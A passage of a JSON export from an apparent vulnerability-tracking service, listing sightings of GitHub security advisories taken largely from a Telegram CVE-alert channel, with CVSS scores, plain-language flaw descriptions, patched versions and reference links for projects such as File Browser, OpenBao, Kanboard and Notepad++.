https://github.com/lxc/incus/security/advisories/GHSA-9q7c-qmhm-jv86\n2. https://github.com/lxc/incus/commit/2516fb19ad8428454cb4edfe70c0a5f0dc1da214\n3. https://github.com/lxc/incus/commit/a7c33301738aede3c035063e973b1d885d9bac7c", "creation_timestamp": "2025-06-25T18:06:29.000000Z"}, {"uuid": "0e8c809f-12ee-4de5-ba72-c56d3d3bdd99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG9P-C3WH-Q83X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19501", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52569\n\ud83d\udd25 CVSS Score: 6.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: GitForge.jl is a unified interface for interacting with Git \"forges.\" Versions prior to 5.9.1 lack input validation of input validation for user-provided values in certain functions. In the `GitHub.repo()` function, the user can provide any string for the `repo_name` field. These inputs are not validated or safely encoded and are sent directly to the server. This means a user can add path traversal patterns like `../` in the input to access any other endpoints on `api.github.com` that were not intended. Users should upgrade immediately to v5.9.1 or later to receive a patch. All prior versions are vulnerable. No known workarounds are available.\n\ud83d\udccf Published: 2025-06-25T16:41:46.303Z\n\ud83d\udccf Modified: 2025-06-25T16:41:46.303Z\n\ud83d\udd17 References:\n1. https://github.com/JuliaWeb/GitHub.jl/security/advisories/GHSA-jg9p-c3wh-q83x\n2. https://github.com/JuliaWeb/GitHub.jl/pull/224", "creation_timestamp": "2025-06-25T18:06:32.000000Z"}, {"uuid": "488541a9-3a53-4e1f-83a2-02b030e54ae0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3HJV-C53M-58JJ", "type": "published-proof-of-concept", "source": "Telegram/LhBAsLXZuywUMfmIXbSwPnWzjb6RJaoGfmWe6gs8QchtB8o", "content": "", "creation_timestamp": "2026-04-23T21:26:14.000000Z"}, {"uuid": "a209bc1f-9074-44c0-8332-e6cb81b5225d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3V48-283X-F2W4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19968", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52996\n\ud83d\udd25 CVSS Score: 3.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. In versions 2.32.0 and prior, the implementation of password protected links is error-prone, resulting in potential unprotected sharing of a file through a direct download link. This link can either be shared unknowingly by a user or discovered from various locations such as the browser history or the log of a proxy server used. At time of publication, no known patched versions are available.\n\ud83d\udccf Published: 2025-06-30T19:58:33.484Z\n\ud83d\udccf Modified: 2025-06-30T19:58:33.484Z\n\ud83d\udd17 References:\n1. https://github.com/filebrowser/filebrowser/security/advisories/GHSA-3v48-283x-f2w4\n2. https://github.com/filebrowser/filebrowser/issues/5239", "creation_timestamp": "2025-06-30T20:08:45.000000Z"}, {"uuid": "e0f2f16c-042b-40a3-a44e-e46f537aa6d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3QP-HWVR-9XCQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19645", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52477\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: Octo-STS is a GitHub App that acts like a Security Token Service (STS) for the GitHub API. Octo-STS versions before v0.5.3 are vulnerable to unauthenticated SSRF by abusing fields in OpenID Connect tokens. Malicious tokens were shown to trigger internal network requests which could reflect error logs with sensitive information. Upgrade to v0.5.3 to resolve this issue. This version includes patch sets to sanitize input and redact logging.\n\ud83d\udccf Published: 2025-06-26T16:46:09.380Z\n\ud83d\udccf Modified: 2025-06-26T16:46:09.380Z\n\ud83d\udd17 References:\n1. https://github.com/octo-sts/app/security/advisories/GHSA-h3qp-hwvr-9xcq\n2. https://github.com/octo-sts/app/security/advisories/GHSA-h3qp-hwvr-9xcq\n3. https://github.com/octo-sts/app/commit/0f177fde54f9318e33f0bba6abaea9463a7c3afd\n4. https://github.com/octo-sts/app/commit/b3976e39bd8c8c217c0670747d34a4499043da92", "creation_timestamp": "2025-06-26T17:51:01.000000Z"}, {"uuid": "51ec94f2-cefc-4715-a81c-acc5a3eaa0f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RH7V-6W34-W2RR", "type": "seen", "source": "Telegram/BiTM4VWQdbYmMG43-mv447qo5-YjFbOvUme2BKAYDCNP_Pw", "content": "", "creation_timestamp": "2026-04-23T21:26:31.000000Z"}, {"uuid": "c2991fec-af50-48da-afd8-9d8f14f7a5bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-48M6-CH88-55MJ", "type": "seen", "source": "Telegram/BiTM4VWQdbYmMG43-mv447qo5-YjFbOvUme2BKAYDCNP_Pw", "content": "", "creation_timestamp": "2026-04-23T21:26:31.000000Z"}, {"uuid": "e37db16a-1c76-4a1c-b822-be28e3a2c867", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JPM-CGX2-8H37", "type": "seen", "source": "Telegram/BiTM4VWQdbYmMG43-mv447qo5-YjFbOvUme2BKAYDCNP_Pw", "content": "", "creation_timestamp": "2026-04-23T21:26:31.000000Z"}, {"uuid": "9c1daa7d-54f4-4f8f-ad60-4534e0db712b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVRR-QHGW-2MM6", "type": "seen", "source": "Telegram/BiTM4VWQdbYmMG43-mv447qo5-YjFbOvUme2BKAYDCNP_Pw", "content": "", "creation_timestamp": "2026-04-23T21:26:31.000000Z"}, {"uuid": "7da8b14d-6809-4fc0-bb02-254d45241d70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XHMJ-RG95-44HV", "type": "seen", "source": "Telegram/BiTM4VWQdbYmMG43-mv447qo5-YjFbOvUme2BKAYDCNP_Pw", "content": "", "creation_timestamp": "2026-04-23T21:26:31.000000Z"}, {"uuid": "70e5fc9e-1d65-4b81-99b6-1410f9b4fb99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RMWH-G367-MJ4X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19970", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52901\n\ud83d\udd25 CVSS Score: 4.5 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.33.9, access tokens are used as GET parameters. The JSON Web Token (JWT) which is used as a session identifier will get leaked to anyone having access to the URLs accessed by the user. This will give an attacker full access to a user's account and, in consequence, to all sensitive files the user has access to. This issue has been patched in version 2.33.9.\n\ud83d\udccf Published: 2025-06-30T19:56:25.114Z\n\ud83d\udccf Modified: 2025-06-30T19:56:25.114Z\n\ud83d\udd17 References:\n1. https://github.com/filebrowser/filebrowser/security/advisories/GHSA-rmwh-g367-mj4x\n2. https://github.com/filebrowser/filebrowser/commit/d5b39a14fd3fc0d1c364116b41289484df7c27b2\n3. https://github.com/filebrowser/filebrowser/releases/tag/v2.33.9", "creation_timestamp": "2025-06-30T20:08:48.000000Z"}, {"uuid": "576cf32f-0992-4bf9-b156-d2d653426518", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MGFV-2362-JQ96", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19102", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52488\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.\n\ud83d\udccf Published: 2025-06-21T02:51:25.252Z\n\ud83d\udccf Modified: 2025-06-21T02:51:25.252Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96", "creation_timestamp": "2025-06-21T03:45:46.000000Z"}, {"uuid": "f70aa818-6620-4933-bdb6-020c421d179c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6QHV-4H7R-2G9M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52556\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to version 1.0.3, there is a flaw in the timestamp response signature verification logic. In particular, chain verification is performed against the TSR's embedded certificates up to the trusted root(s), but fails to verify the TSR's own signature against the timestamping leaf certificates. Consequently, vulnerable versions perform insufficient signature validation to properly consider a TSR verified, as the attacker can introduce any TSR signature so long as the embedded leaf chains up to some root TSA. This issue has been patched in version 1.0.3. There is no workaround for this issue.\n\ud83d\udccf Published: 2025-06-21T01:33:18.829Z\n\ud83d\udccf Modified: 2025-06-21T01:33:18.829Z\n\ud83d\udd17 References:\n1. https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-6qhv-4h7r-2g9m\n2. https://github.com/trailofbits/rfc3161-client/commit/724a184f953e3f171f85cb223871172b41b0d0dc", "creation_timestamp": "2025-06-21T03:25:30.000000Z"}, {"uuid": "30a62994-21e9-43a9-9cac-d4652142e47d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G2XX-229F-3QJM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19467", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-50178\n\ud83d\udd25 CVSS Score: 6.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: GitForge.jl is a unified interface for interacting with Git \"forges.\" Versions prior to 0.4.3 lack input validation for user provided values in certain functions. In the `GitForge.get_repo` function for GitHub, the user can provide any string for the owner and repo fields. These inputs are not validated or safely encoded and are sent directly to the server. This means a user can add path traversal patterns like `../` in the input to access any other endpoints on api.github.com that were not intended. Version 0.4.3 contains a patch for the issue. No known workarounds are available.\n\ud83d\udccf Published: 2025-06-25T15:12:24.751Z\n\ud83d\udccf Modified: 2025-06-25T15:20:43.040Z\n\ud83d\udd17 References:\n1. https://github.com/JuliaWeb/GitForge.jl/security/advisories/GHSA-g2xx-229f-3qjm\n2. https://github.com/JuliaWeb/GitForge.jl/pull/50", "creation_timestamp": "2025-06-25T15:52:13.000000Z"}, {"uuid": "df5a28cd-7945-4467-8043-1909307eea1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8JV-RG3H-FC68", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19475", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52480\n\ud83d\udd25 CVSS Score: 8.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Registrator is a GitHub app that automates creation of registration pull requests for julia packages to the General registry. Prior to version 1.9.5, if the clone URL returned by GitHub is malicious (or can be injected using upstream vulnerabilities), an argument injection is possible in the `gettreesha()` function. This can then lead to a potential remote code execution. Users should upgrade immediately to v1.9.5 to receive a patch. All prior versions are vulnerable. No known workarounds are available.\n\ud83d\udccf Published: 2025-06-25T16:37:32.944Z\n\ud83d\udccf Modified: 2025-06-25T16:37:32.944Z\n\ud83d\udd17 References:\n1. https://github.com/JuliaRegistries/Registrator.jl/security/advisories/GHSA-w8jv-rg3h-fc68\n2. https://github.com/JuliaRegistries/Registrator.jl/pull/449", "creation_timestamp": "2025-06-25T16:47:30.000000Z"}, {"uuid": "7a8870ae-82be-4664-a25a-8dd4f468f453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-589R-G8HF-XX59", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19474", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52483\n\ud83d\udd25 CVSS Score: 8.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Registrator is a GitHub app that automates creation of registration pull requests for julia packages to the General registry. Prior to version 1.9.5, if the clone URL returned by GitHub is malicious (or can be injected using upstream vulnerabilities) a shell script injection can occur within the `withpasswd` function. Alternatively, an argument injection is possible in the `gettreesha `function. either of these can then lead to a potential RCE. Users should upgrade immediately to v1.9.5 to receive a fix. All prior versions are vulnerable. No known workarounds are available.\n\ud83d\udccf Published: 2025-06-25T16:39:45.707Z\n\ud83d\udccf Modified: 2025-06-25T16:39:45.707Z\n\ud83d\udd17 References:\n1. https://github.com/JuliaRegistries/Registrator.jl/security/advisories/GHSA-589r-g8hf-xx59\n2. https://github.com/JuliaRegistries/Registrator.jl/pull/448", "creation_timestamp": "2025-06-25T16:47:28.000000Z"}, {"uuid": "504ab757-1523-4931-bca7-f2d26eb69a38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RXPM-G7GW-4MRV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19487", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-50179\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. An attacker could use a cross-site request forgery vulnerability in Tuleap Community Edition prior to version 16.8.99.1749830289 and Tuleap Enterprise Edition prior to version 16.9-1 to trick victims into changing the canned responses. Tuleap Community Edition 16.8.99.1749830289 and Tuleap Enterprise Edition 16.9-1 contain a patch for the issue.\n\ud83d\udccf Published: 2025-06-25T15:48:24.488Z\n\ud83d\udccf Modified: 2025-06-25T16:00:32.891Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-rxpm-g7gw-4mrv\n2. https://github.com/Enalean/tuleap/commit/0f9aab6e3640e892c74c9dfc90ad65fd3aff499e\n3. https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&amp;h=0f9aab6e3640e892c74c9dfc90ad65fd3aff499e\n4. https://tuleap.net/plugins/tracker/?aid=43357", "creation_timestamp": "2025-06-25T16:47:45.000000Z"}, {"uuid": "79bb78c5-99ed-4d5a-94e6-a16c5db5a6dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V38X-C887-992F", "type": "published-proof-of-concept", "source": "Telegram/LhBAsLXZuywUMfmIXbSwPnWzjb6RJaoGfmWe6gs8QchtB8o", "content": "", "creation_timestamp": "2026-04-23T21:26:14.000000Z"}, {"uuid": "6cf1f931-80a9-45ec-b4a1-4d2fc3a0874b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PRPJ-RCHP-9J5H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52894\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: OpenBao exists to provide a software solution to manage, store, and distribute sensitive data including secrets, certificates, and keys. OpenBao before v2.3.0 allowed an attacker to perform unauthenticated, unaudited cancellation of root rekey and recovery rekey operations, effecting a denial of service. In OpenBao v2.2.0 and later, manually setting the configuration option `disable_unauthed_rekey_endpoints=true` allows an operator to deny these rarely-used endpoints on global listeners. A patch is available at commit fe75468822a22a88318c6079425357a02ae5b77b. In a future OpenBao release communicated on OpenBao's website, the maintainers will set this to `true` for all users and provide an authenticated alternative. As a workaround, if an active proxy or load balancer sits in front of OpenBao, an operator can deny requests to these endpoints from unauthorized IP ranges.\n\ud83d\udccf Published: 2025-06-25T16:59:02.058Z\n\ud83d\udccf Modified: 2025-06-25T17:00:31.313Z\n\ud83d\udd17 References:\n1. https://github.com/openbao/openbao/security/advisories/GHSA-prpj-rchp-9j5h\n2. https://github.com/openbao/openbao/commit/fe75468822a22a88318c6079425357a02ae5b77b\n3. https://openbao.org/docs/deprecation\n4. https://openbao.org/docs/deprecation/unauthed-rekey", "creation_timestamp": "2025-06-25T18:06:24.000000Z"}, {"uuid": "9fb400e8-abe7-42ac-b433-db985d3564c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F228-CHMX-V6J6", "type": "published-proof-of-concept", "source": "Telegram/LhBAsLXZuywUMfmIXbSwPnWzjb6RJaoGfmWe6gs8QchtB8o", "content": "", "creation_timestamp": "2026-04-23T21:26:14.000000Z"}, {"uuid": "dfe973cc-052a-4d59-979d-c8489e7243dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8F5R-8CMQ-7FMQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19495", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52893\n\ud83d\udd25 CVSS Score: 4.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: OpenBao exists to provide a software solution to manage, store, and distribute sensitive data including secrets, certificates, and keys. OpenBao before v2.3.0 may leak sensitive information in logs when processing malformed data. This is separate from the earlier HCSEC-2025-09 / CVE-2025-4166. This issue has been fixed in OpenBao v2.3.0 and later. Like with HCSEC-2025-09, there is no known workaround except to ensure properly formatted requests from all clients.\n\ud83d\udccf Published: 2025-06-25T16:54:50.262Z\n\ud83d\udccf Modified: 2025-06-25T16:54:50.262Z\n\ud83d\udd17 References:\n1. https://github.com/openbao/openbao/security/advisories/GHSA-8f5r-8cmq-7fmq\n2. https://github.com/go-viper/mapstructure/pull/105\n3. https://github.com/go-viper/mapstructure/commit/ed3f92181528ff776a0324107b8b55026e93766a\n4. https://github.com/openbao/openbao/commit/cf5e920badbf96b41253534a3fd5ff5063bf4b30\n5. https://discuss.hashicorp.com/t/hcsec-2025-09-vault-may-expose-sensitive-information-in-error-logs-when-processing-malformed-data-with-the-kv-v2-plugin/74717\n6. https://github.com/go-viper/mapstructure/releases/tag/v2.3.0", "creation_timestamp": "2025-06-25T18:06:26.000000Z"}, {"uuid": "48ebff19-6d9c-47de-8974-b91b0e741ce3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QW57-7CX6-WVP7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19499", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52576\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Kanboard is project management software that focuses on the Kanban methodology. Prior to version 1.2.46, Kanboard is vulnerable to username enumeration and IP spoofing-based brute-force protection bypass. By analyzing login behavior and abusing trusted HTTP headers, an attacker can determine valid usernames and circumvent rate-limiting or blocking mechanisms. Any organization running a publicly accessible Kanboard instance is affected, especially if relying on IP-based protections like Fail2Ban or CAPTCHA for login rate-limiting. Attackers with access to the login page can exploit this flaw to enumerate valid usernames and bypass IP-based blocking mechanisms, putting all user accounts at higher risk of brute-force or credential stuffing attacks. Version 1.2.46 contains a patch for the issue.\n\ud83d\udccf Published: 2025-06-25T16:46:01.954Z\n\ud83d\udccf Modified: 2025-06-25T16:46:01.954Z\n\ud83d\udd17 References:\n1. https://github.com/kanboard/kanboard/security/advisories/GHSA-qw57-7cx6-wvp7\n2. https://github.com/kanboard/kanboard/commit/3079623640dc39f9c7b0c840d2a79095331051f1\n3. https://github.com/kanboard/kanboard/blob/cbb7e60fb595ff4572bb8801b275a0b451c4bda0/app/Model/UserLockingModel.php#L101-L104\n4. https://github.com/kanboard/kanboard/blob/cbb7e60fb595ff4572bb8801b275a0b451c4bda0/app/Subscriber/AuthSubscriber.php#L96-L108", "creation_timestamp": "2025-06-25T18:06:30.000000Z"}, {"uuid": "20d33eec-44f5-4cf7-af7a-de68779f63c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-39HJ-FXVW-758M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19996", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53095\n\ud83d\udd25 CVSS Score: 9.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Sunshine is a self-hosted game stream host for Moonlight. Prior to version 2025.628.4510, the web UI of Sunshine lacks protection against Cross-Site Request Forgery (CSRF) attacks. This vulnerability allows an attacker to craft a malicious web page that, when visited by an authenticated user, can trigger unintended actions within the Sunshine application on behalf of that user. Specifically, since the application does OS command execution by design, this issue can be exploited to abuse the \"Command Preparations\" feature, enabling an attacker to inject arbitrary commands that will be executed with Administrator privileges when an application is launched. This issue has been patched in version 2025.628.4510.\n\ud83d\udccf Published: 2025-07-01T01:33:22.331Z\n\ud83d\udccf Modified: 2025-07-01T01:33:22.331Z\n\ud83d\udd17 References:\n1. https://github.com/LizardByte/Sunshine/security/advisories/GHSA-39hj-fxvw-758m\n2. https://github.com/LizardByte/Sunshine/commit/738ac93a0ec1cd10412d1f339968775f53bfefe0", "creation_timestamp": "2025-07-01T02:07:41.000000Z"}, {"uuid": "64d15897-8083-45e6-90b8-ab26b4f9dc7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P423-J2CM-9VMQ", "type": "seen", "source": "Telegram/iUoBG-vF-CkTsWyCM6Li0-JDSLT3y0wia_1SGPubhjeGviU", "content": "", "creation_timestamp": "2026-04-15T17:20:42.000000Z"}, {"uuid": "d4263f7f-c6d9-4ae9-8292-3b6eabe4921e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VX8-V79M-6M24", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/20007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49144\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Notepad++ is a free and open-source source code editor. In versions 8.8.1 and prior, a privilege escalation vulnerability exists in the Notepad++ v8.8.1 installer that allows unprivileged users to gain SYSTEM-level privileges through insecure executable search paths. An attacker could use social engineering or clickjacking to trick users into downloading both the legitimate installer and a malicious executable to the same directory (typically Downloads folder - which is known as Vulnerable directory). Upon running the installer, the attack executes automatically with SYSTEM privileges. This issue has been fixed and will be released in version 8.8.2.\n\ud83d\udccf Published: 2025-06-23T19:01:16.276Z\n\ud83d\udccf Modified: 2025-07-01T03:55:56.212Z\n\ud83d\udd17 References:\n1. https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-9vx8-v79m-6m24\n2. https://github.com/notepad-plus-plus/notepad-plus-plus/commit/f2346ea00d5b4d907ed39d8726b38d77c8198f30\n3. https://drive.google.com/drive/folders/11yeUSWgqHvt4Bz5jO3ilRRfcpQZ6Gvpn", "creation_timestamp": "2025-07-01T05:10:45.000000Z"}, {"uuid": "ed90ee21-5722-4120-b7fe-819bfff48b0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H34R-JXQM-QGPR", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/20016", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-6224\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Certificate generation in juju/utils using the cert.NewLeaf function could include private information. If this certificate were then transferred over the network in plaintext, an attacker listening on that network could sniff the certificate and trivially extract the private key from it.\n\ud83d\udccf Published: 2025-07-01T10:39:34.322Z\n\ud83d\udccf Modified: 2025-07-01T10:39:34.322Z\n\ud83d\udd17 References:\n1. https://github.com/juju/utils/security/advisories/GHSA-h34r-jxqm-qgpr", "creation_timestamp": "2025-07-01T11:09:51.000000Z"}, {"uuid": "7ae41271-e5f4-4f2e-8a5a-2e92776aa772", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5FW2-MWHH-9947", "type": "seen", "source": "Telegram/7J2TQ7boZzup2REzz7I0UjLQbEj9GYA2sSzdylgDH8Evqbs", "content": "", "creation_timestamp": "2026-04-23T21:27:11.000000Z"}, {"uuid": "a05c0eae-d66f-4119-9181-b23b7d56013c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:1852", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/20026", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4042\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in ghostscript. The fix for 